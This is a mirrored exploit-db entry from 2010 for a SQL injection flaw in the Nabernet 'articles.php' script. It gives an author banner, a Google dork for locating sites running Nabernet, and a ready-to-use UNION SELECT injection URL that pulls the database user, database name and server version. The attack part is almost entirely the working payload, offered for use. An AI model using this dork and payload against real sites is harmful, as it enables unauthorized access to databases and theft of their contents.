Nabernet – ‘articles.php’ SQL Injection

  • 作者: AtT4CKxT3rR0r1ST
    日期: 2010-02-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11482/
  • Nabernet (articles.php) Sql Injection Vulnerability
    ==============================================================
    
    ####################################################################
    .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
    .:. Home : www.sec-attack.com/vb [Sec Attack Team]
    .:. Bug Type : Sql Injection[Mysql]
    .:. Dork : "powered by Nabernet"
    
    ####################################################################
    
    ===[ Exploit ]===
    
    www.site.com/articles.php?id=null[Sql]
    
    www.site.com/articles.php?id=null'+and+1=2+union+select+null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,null,null,null,null,null,null-- -
    
    
    ####################################################################